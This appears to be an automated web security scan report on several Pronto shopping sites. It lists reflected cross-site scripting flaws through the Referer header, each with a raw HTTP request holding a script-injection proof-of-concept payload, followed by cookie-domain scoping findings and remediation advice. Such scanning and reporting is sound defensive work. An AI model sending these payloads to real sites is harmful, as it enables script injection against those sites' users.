This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bathroom-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: ba68c"><script>alert(1)</script>de57eba1ae3
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a888"><script>alert(1)</script>9fa4810c784 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bed HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 5a888"><script>alert(1)</script>9fa4810c784
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c750"><script>alert(1)</script>9686f617c70 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bedroom-and-bathroom-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 5c750"><script>alert(1)</script>9686f617c70
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82b24"><script>alert(1)</script>ac3b7cbde91 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /blankets-and-throws HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 82b24"><script>alert(1)</script>ac3b7cbde91
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d561d"><script>alert(1)</script>6e93d31fdb7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /coverlets-and-quilts HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: d561d"><script>alert(1)</script>6e93d31fdb7
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26a81"><script>alert(1)</script>f61f6c068b7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dining HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 26a81"><script>alert(1)</script>f61f6c068b7
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4720a"><script>alert(1)</script>9d578300a61 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /dining-and-kitchen-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 4720a"><script>alert(1)</script>9d578300a61
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 341fa"><script>alert(1)</script>660c1813f19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 341fa"><script>alert(1)</script>660c1813f19
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c1f"><script>alert(1)</script>d3ec467a22a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home-office-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 57c1f"><script>alert(1)</script>d3ec467a22a
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59dc1"><script>alert(1)</script>f6271e666b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /kitchen HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 59dc1"><script>alert(1)</script>f6271e666b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e822c"><script>alert(1)</script>5082109b791 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /kitchen-electrics HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: e822c"><script>alert(1)</script>5082109b791
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dfb"><script>alert(1)</script>87ec1f77ff4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lighting HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: d0dfb"><script>alert(1)</script>87ec1f77ff4
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f0b0"><script>alert(1)</script>d90815b86df was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /living-room-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 1f0b0"><script>alert(1)</script>d90815b86df
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a54e"><script>alert(1)</script>1de22d3616b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /outdoor-furniture HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 1a54e"><script>alert(1)</script>1de22d3616b
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e6a9"><script>alert(1)</script>45f5ae50bea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /pillows HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524; Referer: 3e6a9"><script>alert(1)</script>45f5ae50bea
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2829c"><script>alert(1)</script>fe069088f49 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec8d"><script>alert(1)</script>06331473fd9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce353'-alert(1)-'f5c1667a225 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?mid=41048ba4-12e1505343e-294f HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /discount-barbecue-grills-v1_4_50_270-cs HTTP/1.1 Host: www.pronto.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productRedirection.do?exitPoint=disambiguated-search&merchantProductId=1688692330µsiteId=pronto_style&mid=4462231-12e14ffec7a-48f9&nlCellNum=0&pageLocation=gridProductImage5&parentId=35a611ad-12e151753d5--3ea0&shouldLookupGuidesterCpc=true HTTP/1.1 Host: www.pronto.com Proxy-Connection: keep-alive Referer: http://www.prontostyle.com/prodRedirExitInterst.do?exitPoint=disambiguated-search&merchantProductId=1688692330&pageLocation=gridProductImage5&parentId=35a611ad-12e151753d5--3ea0&shouldLookupGuidesterCpc=true Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: V9Q1=3nzgaDHtoPhvmtU4ci8dAjhKb0hwu4DL4JGwutdw3oCfywvv2ADV8Ug
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.prontostyle.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?mid=41048ba4-12e1505343e-294f HTTP/1.1 Host: www.prontotech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productRedirection.do?micrositeId=pronto_home&parentId=4462231-12e14ffec7a-5b53&&nlCellNum=0&exitPoint=disambiguated-search&pageLocation=gridFeaturedProductImage1&merchantProductId=1790835203 HTTP/1.1 Host: www.pronto.com Proxy-Connection: keep-alive Referer: http://www.prontohome.com/prodRedirExitInterst.do?exitPoint=disambiguated-search&merchantProductId=1790835203&pageLocation=gridFeaturedProductImage1&parentId=4462231-12e14ffec7a-5b53 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: V9Q1=3nzgaDHtoPhvmtU4ci8dAjhKb0hwu4DL4JGwutdw3oCfywvv2ADV8Ug; SESSIONID=1537052450; abt=ProntoV3_5_5-1.161-cellNum_8; V_ID=4b3473a3-12e14fe8591-6986; JSESSIONID=626065A52BAAA302471FF69164075061; M_ID=41048ba4-12e1505343e-294f
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 11 Feb 2011 14:31:53 GMT Server: Apache/2.2.4 (Fedora) Set-Cookie: JSESSIONID=AC64775C602DAC00A64012CF57FA9098; Path=/ Set-Cookie: M_ID=41048ba4-12e1505343e-294f; Domain=.pronto.com; Expires=Sun, 10-Feb-2013 14:31:53 GMT; Path=/ P3P: CP="CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV" Set-Cookie: REQUESTID26337=-7a5f0ee9-12e151f174b--6842; Domain=.pronto.com; Expires=Sun, 13-Mar-2011 14:31:53 GMT; Path=/ Location: http://www.bellacor.com/productDetail/547288.htm?partID=pronto-Recessed-547288 Content-Length: 0 Content-Type: text/html;charset=UTF-8 Via: CN-5000 Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bakeware HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bath HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bath-accessories HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /bath-mats HTTP/1.1 Host: www.prontohome.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: M_ID=41048ba4-12e1505343e-294f; V_ID=41048ba4-12e1505343e-2950; abt=ProntoV3_5_5-1.161-cellNum_1; JSESSIONID=4438761FC9DFEA5F2FDF38B707066134; __utmz=71541330.1297434472.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); entryPoint=direct; __utma=71541330.3347892469840989000.1297434472.1297434472.1297434472.1; __utmc=71541330; __utmb=71541330.4.10.1297434472; notPreviouslyLoggedIn=true; SESSIONID=946457524;
